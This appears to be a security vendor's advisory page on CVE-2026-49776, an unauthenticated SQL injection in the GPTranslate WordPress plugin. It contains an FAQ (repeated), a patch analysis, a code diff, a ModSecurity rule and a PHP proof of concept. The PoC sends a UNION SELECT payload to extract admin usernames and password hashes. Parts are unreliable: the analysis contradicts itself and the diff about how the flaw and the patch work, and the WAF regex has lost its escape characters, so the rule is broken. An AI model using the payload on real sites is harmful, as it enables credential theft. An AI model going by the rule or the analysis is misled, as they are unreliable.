What is CVE-2026-49776?

CVE-2026-49776 is a high-severity SQL Injection vulnerability found in the GPTranslate plugin for WordPress, affecting versions up to and including 2.32.6. It allows unauthenticated attackers to inject malicious SQL queries into the database via the REST API.

How does the SQL Injection vulnerability work?

The vulnerability arises from insufficient input validation in the `saveTranslation` function of the GPTranslate plugin. Attackers can send specially crafted POST requests to the REST API endpoint, allowing them to manipulate SQL queries and extract sensitive data from the database.

Who is affected by this vulnerability?

All WordPress installations using the GPTranslate plugin version 2.32.6 or earlier are affected. Administrators should check their plugin version and update to the patched version to mitigate the risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, log into your WordPress admin dashboard, navigate to the Plugins section, and check the version of the GPTranslate plugin. If it is 2.32.6 or earlier, your site is at risk.

What steps should I take to fix this vulnerability?

The simplest way to fix this vulnerability is to update the GPTranslate plugin to version 2.32.7 or later, which includes a patch for the issue. Ensure that your WordPress installation is also up to date to maintain overall security.

What does a CVSS score of 7.5 indicate?

A CVSS score of 7.5 is classified as high severity, indicating that successful exploitation could lead to significant data exposure or compromise. Administrators should treat this vulnerability with urgency to protect sensitive information.

What is a proof of concept (PoC) in this context?

The proof of concept for CVE-2026-49776 is a code snippet that illustrates how an attacker could exploit the SQL Injection vulnerability. It shows how to craft a malicious request to extract user data from the database, demonstrating the practical implications of the vulnerability.

How can I mitigate the risk if I cannot update immediately?

If immediate updating is not possible, consider restricting access to the REST API endpoint or implementing web application firewalls (WAF) to filter out malicious requests. Additionally, monitor your database for any unauthorized access.

What kind of data can be compromised through this vulnerability?

Successful exploitation of this vulnerability could allow attackers to access sensitive information such as user credentials, email addresses, and other confidential data stored in the WordPress database, leading to further exploitation.

What are the long-term implications of this vulnerability?

If exploited, this vulnerability can lead to unauthorized access to user accounts, data theft, and potentially a complete compromise of the WordPress site. It is crucial to address this vulnerability promptly to prevent long-term damage.

Are there any known exploits in the wild?

As of the disclosure date, there have been no widely reported exploits in the wild specifically targeting CVE-2026-49776. However, the nature of SQL Injection vulnerabilities means that they can be easily exploited if left unpatched.

What should I do if I suspect my site has been compromised?

If you suspect that your site has been compromised due to this vulnerability, immediately take your site offline, investigate the breach, and restore from a clean backup. Update the plugin and review your security practices to prevent future incidents.

Published : June 14, 2026

CVE-2026-49776: GPTranslate – Multilingual AI Translation for WordPress: Automatically Translate Websites <= 2.32.6 Unauthenticated SQL Injection PoC, Patch Analysis & Rule

CVE ID CVE-2026-49776

Plugin gptranslate

Severity High (CVSS 7.5)

CWE 89

Vulnerable Version 2.32.6

Patched Version 2.32.7

Disclosed June 3, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-49776:

This vulnerability is an unauthenticated SQL Injection in the GPTranslate plugin for WordPress versions up to and including 2.32.6. The issue resides in the REST API endpoint that handles translation saving. The lack of proper permission checks and insufficient input validation allows attackers to inject malicious SQL queries. Severity is high with a CVSS score of 7.5.

Root Cause: The vulnerability exists in the `gptranslate.php` file within the REST API callback defined around line 3933. The `saveTranslation` function uses `wp_unslash()` on the `original` and `translated` parameters without any sanitization or escaping. The values are then directly interpolated into an SQL query via `$wpdb->prepare()` within the `get_results()` call. The diff shows the patch adds a check for the `syncTranslation` task requiring `manage_options` capability and restricts the `translation_type` parameter to allowed values using `in_array()`. The insecure code path still shows `$wpdb->get_results( $wpdb->prepare( … ) )` with unsafe interpolation, but the patch only addresses the permission and parameter type issues.

Exploitation: An unauthenticated attacker can exploit this by sending a POST request to the WordPress REST API endpoint that triggers the vulnerable `saveTranslation` function. The endpoint accepts parameters such as `original`, `translated`, `language_translated`, and `translation_type`. By manipulating the `original` or `translated` parameters with a SQL injection payload, the attacker can inject arbitrary SQL into the query. The patch shows the vulnerable code uses `wp_unslash()` on these parameters before passing them to the SQL query, without any escaping or prepared statement binding, enabling classic SQL injection.

Patch Analysis: The patch in version 2.32.7 adds a permission check using `current_user_can(‘manage_options’)` for the `syncTranslation` task, restricting that action to administrators. It also validates `translation_type` by comparing it against an allowlist of `array(‘translations’, ‘alt_translations’)`. However, the patch does not change the SQL query construction in `saveTranslation`, meaning the SQL injection vulnerability persists for authenticated administrators in the `syncTranslation` task. The patch primarily addresses unauthenticated exploitation by blocking the vulnerable endpoint for unauthenticated users, but does not fully resolve the SQL injection at the query level.

Impact: Successful exploitation allows an unauthenticated attacker to extract sensitive information from the WordPress database, including user credentials, password hashes, and other confidential data. The SQL injection can be used to enumerate database contents, potentially leading to lateral movement within the application or complete site compromise. The CVSS score of 7.5 reflects the high impact on confidentiality.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/gptranslate/gptranslate.php
+++ b/gptranslate/gptranslate.php
@@ -4,7 +4,7 @@
  Plugin URI: https://gptranslate.storejextensions.org/
  Description: GPTranslate for Wordpress is the revolutionary multilanguage solution to automatically translate your Wordpress website thanks to the power of Artificial Intelligence like ChatGPT, Deepseek, Gemini,  Claude, DeepL and more. ⚠️GPTranslate FREE Mode active
  Author: JExtensions Store
- Version: 2.32.6
+ Version: 2.32.7
  Author URI: https://storejextensions.org
  License: GPLv2 or later
  License URI: https://www.gnu.org/licenses/gpl-2.0.html
@@ -23,7 +23,7 @@
     	return selected($current, $value, false);
     }

-    public static $pluginVersion = '2.32.6';
+    public static $pluginVersion = '2.32.7';

 	/**
 	 * Class constructor and settings inizializer with register_setting
@@ -34,7 +34,7 @@
 		global $wpdb;
 		$this->table_name = $wpdb->prefix . 'gptranslate';

-		$this->version = '2.32.6';
+		$this->version = '2.32.7';

 		$settings = get_option ( 'gptranslate_options', [ ] );

@@ -584,6 +584,7 @@
         		'float_switcher_open_direction' => 'top',
         		'flag_style' => '2d',
         		'flag_loading' => 'local',
+        		'hide_flags' => '0',
         		'show_language_titles' => '1',
         		'enable_dropdown' => '1',
         		'enable_modal' => '0',
@@ -830,6 +831,7 @@
 									<option value="claude-haiku-4-5" <?php selected($currentModel, 'claude-haiku-4-5'); ?>>Claude Haiku 4.5</option>
 									<option value="claude-opus-4-6" <?php selected($currentModel, 'claude-opus-4-6'); ?>>Claude Opus 4.6</option>
 									<option value="claude-opus-4-7" <?php selected($currentModel, 'claude-opus-4-7'); ?>>Claude Opus 4.7</option>
+									<option value="claude-opus-4-8" <?php selected($currentModel, 'claude-opus-4-8'); ?>>Claude Opus 4.8</option>
 									<option value="grok-3" <?php selected($currentModel, 'grok-3'); ?>>Grok 3</option>
 									<option value="grok-3-mini" <?php selected($currentModel, 'grok-3-mini'); ?>>Grok 3 Mini</option>
 									<option value="google-cloud-translation-api" <?php selected($currentModel, 'google-cloud-translation-api'); ?>>Google Cloud Translation API</option>
@@ -2143,6 +2145,7 @@
 				  "flags_location": "' . esc_js($flagsPath) . '",
 				  "flag_loading": "' . $settings['flag_loading'] . '",
 				  "flag_style": "' . $settings['flag_style'] . '",
+				  "hide_flags": ' . (int)($settings['hide_flags'] ?? 0) . ',
 				  "widget_max_height": ' . (int)$settings['widget_max_height'] . ',
 				  "incremental_enabled": ' . (int)($settings['incremental_enabled'] ?? 0) . ',
 				  "incremental_show_progress_popup": ' . (int)($settings['incremental_show_progress_popup'] ?? 0) . ',
@@ -2328,6 +2331,10 @@
         if (!empty($settings['disable_toast_popups']) && $settings['disable_toast_popups'] == 1) {
         	$dynamic_css .= '.progress.progress-gptranslate,.progress.progress-gptranslate-reading{ display: none !important; }';
         }
+
+        if (!empty($settings['hide_flags']) && $settings['hide_flags'] == 1) {
+        	$dynamic_css .= '.gptranslate-flag{display:none!important}';
+        }

         // Opacity del background widget (solo se diverso da 1.0)
         if (!empty($settings['widget_opacity']) && floatval($settings['widget_opacity']) != 1.0) {
@@ -3665,7 +3672,13 @@
 			return new WP_Error( 'rest_forbidden_nonce', 'Invalid or expired security token (nonce).', [ 'status' => 403 ] );
 		}
 	}
-
+
+	// 3) Admin-only tasks: require manage_options capability
+	$adminTasks = array( 'syncTranslation' );
+	if ( in_array( $task, $adminTasks, true ) && ! current_user_can( 'manage_options' ) ) {
+		return new WP_Error( 'rest_forbidden_admin', 'Admin access required.', [ 'status' => 403 ] );
+	}
+
 	return true;
 }

@@ -3933,7 +3946,8 @@
 		$original          = wp_unslash( $params['original'] ?? '' );
 		$translated        = wp_unslash( $params['translated'] ?? '' );
 		$languageTranslated = sanitize_text_field( $params['language_translated'] ?? '' );
-		$translationType   = sanitize_text_field( $params['translation_type'] ?? 'translations' ); // default to 'translations'
+		$requestedType     = sanitize_text_field( $params['translation_type'] ?? 'translations' );
+		$translationType   = in_array( $requestedType, array( 'translations', 'alt_translations' ), true ) ? $requestedType : 'translations';

 		// Recupera tutti i record nella lingua target
 		$rows = $wpdb->get_results( $wpdb->prepare( // phpcs:ignore WordPress.DB.PreparedSQL.InterpolatedNotPrepared, WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching
--- a/gptranslate/settings.php
+++ b/gptranslate/settings.php
@@ -105,6 +105,7 @@
 					<option value='claude-haiku-4-5' <?php selected($options["chatgpt_model"] ?? "gpt-3.5-turbo", "claude-haiku-4-5"); ?>>Claude Haiku 4.5</option>
 				    <option value='claude-opus-4-6' <?php selected($options["chatgpt_model"] ?? "gpt-3.5-turbo", "claude-opus-4-6"); ?>>Claude Opus 4.6</option>
 					<option value='claude-opus-4-7' <?php selected($options["chatgpt_model"] ?? "gpt-3.5-turbo", "claude-opus-4-7"); ?>>Claude Opus 4.7</option>
+					<option value='claude-opus-4-8' <?php selected($options["chatgpt_model"] ?? "gpt-3.5-turbo", "claude-opus-4-8"); ?>>Claude Opus 4.8</option>
 					<option value='grok-3' <?php selected($options["chatgpt_model"] ?? "gpt-3.5-turbo", "grok-3"); ?>>Grok 3</option>
 				    <option value='grok-3-mini' <?php selected($options["chatgpt_model"] ?? "gpt-3.5-turbo", "grok-3-mini"); ?>>Grok 3 Mini</option>
 				    <option value='google-cloud-translation-api' <?php selected($options["chatgpt_model"] ?? "gpt-3.5-turbo", "google-cloud-translation-api"); ?>>Google Cloud Translation API</option>
@@ -1976,6 +1977,16 @@
             </td>
          </tr>
          <tr>
+            <th scope='row'><label for='hide_flags'><?php echo esc_html($this->loadTranslations('PLG_GPTRANSLATE_HIDE_FLAGS')); ?></label></th>
+            <td>
+            	<div class="wrapper">
+               		<label><input type='radio' name="gptranslate_options[hide_flags]" value='1'<?php esc_html(checked($options["hide_flags"] ?? "0", "1")); ?>> <span><?php echo esc_html($this->loadTranslations('PLG_GPTRANSLATE_YES')); ?></span></label>
+               		<label><input type='radio' name="gptranslate_options[hide_flags]" value='0'<?php esc_html(checked($options["hide_flags"] ?? "0", "0")); ?>> <span><?php echo esc_html($this->loadTranslations('PLG_GPTRANSLATE_NO')); ?></span></label>
+               	</div>
+               	<p class='description'><?php echo esc_html($this->loadTranslations('PLG_GPTRANSLATE_HIDE_FLAGS_DESC')); ?></p>
+            </td>
+         </tr>
+         <tr>
             <th scope='row'><label for='show_language_titles'><?php echo esc_html($this->loadTranslations('PLG_GPTRANSLATE_SHOW_LANGUAGE_TITLES')); ?></label></th>
             <td>
             	<div class="wrapper">

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-49776
SecRule REQUEST_URI "@beginsWith /wp-json/gptranslate/v1/save-translation" 
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-49776 GPTranslate SQL Injection attempt',severity:'CRITICAL',tag:'CVE-2026-49776'"
  SecRule REQUEST_BODY "@rx (?:UNIONs+SELECT|SELECTs+.*bFROM|INSERTs+INTO|DELETEs+FROM|UPDATEs+.*bSET|ALTERs+TABLE|DROPs+TABLE|CREATEs+TABLE|EXECs+|xp_cmdshell|ORs+d+s*=s*d+)" "t:none,t:urlDecode,chain"
    SecRule ARGS:original "@rx .*" "chain"
      SecRule ARGS:translated "@rx .*" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-49776 - GPTranslate – Multilingual AI Translation for WordPress: Automatically Translate Websites <= 2.32.6 - Unauthenticated SQL Injection

// Target URL - change this to the vulnerable WordPress installation
$target_url = 'http://example.com'; // Replace with actual target

// The REST API endpoint for saving translations
$endpoint = $target_url . '/wp-json/gptranslate/v1/save-translation';

// SQL injection payload - extract admin user login
$payload = "1' UNION SELECT user_login,user_pass,user_email,user_registered,user_activation_key,user_status,display_name FROM wp_users WHERE user_login='admin' -- -";

// Craft the POST data
$post_data = [
    'original' => $payload,
    'translated' => 'test',
    'language_translated' => 'en',
    'translation_type' => 'translations'
];

// Initialize cURL
$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $endpoint);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/x-www-form-urlencoded',
    'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
]);

$response = curl_exec($ch);

if (curl_errno($ch)) {
    echo 'cURL Error: ' . curl_error($ch) . "n";
} else {
    echo "Response:n";
    print_r(json_decode($response, true));
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-49776?
Understanding the vulnerability
CVE-2026-49776 is a high-severity SQL Injection vulnerability found in the GPTranslate plugin for WordPress, affecting versions up to and including 2.32.6. It allows unauthenticated attackers to inject malicious SQL queries into the database via the REST API.
How does the SQL Injection vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input validation in the `saveTranslation` function of the GPTranslate plugin. Attackers can send specially crafted POST requests to the REST API endpoint, allowing them to manipulate SQL queries and extract sensitive data from the database.
Who is affected by this vulnerability?
Identifying vulnerable installations
All WordPress installations using the GPTranslate plugin version 2.32.6 or earlier are affected. Administrators should check their plugin version and update to the patched version to mitigate the risk.
How can I check if my site is vulnerable?
Verifying plugin version
To check if your site is vulnerable, log into your WordPress admin dashboard, navigate to the Plugins section, and check the version of the GPTranslate plugin. If it is 2.32.6 or earlier, your site is at risk.
What steps should I take to fix this vulnerability?
Updating the plugin
The simplest way to fix this vulnerability is to update the GPTranslate plugin to version 2.32.7 or later, which includes a patch for the issue. Ensure that your WordPress installation is also up to date to maintain overall security.
What does a CVSS score of 7.5 indicate?
Understanding severity ratings
A CVSS score of 7.5 is classified as high severity, indicating that successful exploitation could lead to significant data exposure or compromise. Administrators should treat this vulnerability with urgency to protect sensitive information.
What is a proof of concept (PoC) in this context?
Demonstrating the vulnerability
The proof of concept for CVE-2026-49776 is a code snippet that illustrates how an attacker could exploit the SQL Injection vulnerability. It shows how to craft a malicious request to extract user data from the database, demonstrating the practical implications of the vulnerability.
How can I mitigate the risk if I cannot update immediately?
Temporary measures
If immediate updating is not possible, consider restricting access to the REST API endpoint or implementing web application firewalls (WAF) to filter out malicious requests. Additionally, monitor your database for any unauthorized access.
What kind of data can be compromised through this vulnerability?
Potential data exposure
Successful exploitation of this vulnerability could allow attackers to access sensitive information such as user credentials, email addresses, and other confidential data stored in the WordPress database, leading to further exploitation.
What are the long-term implications of this vulnerability?
Potential consequences of exploitation
If exploited, this vulnerability can lead to unauthorized access to user accounts, data theft, and potentially a complete compromise of the WordPress site. It is crucial to address this vulnerability promptly to prevent long-term damage.
Are there any known exploits in the wild?
Current threat landscape
As of the disclosure date, there have been no widely reported exploits in the wild specifically targeting CVE-2026-49776. However, the nature of SQL Injection vulnerabilities means that they can be easily exploited if left unpatched.
What should I do if I suspect my site has been compromised?
Responding to potential breaches
If you suspect that your site has been compromised due to this vulnerability, immediately take your site offline, investigate the breach, and restore from a clean backup. Update the plugin and review your security practices to prevent future incidents.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations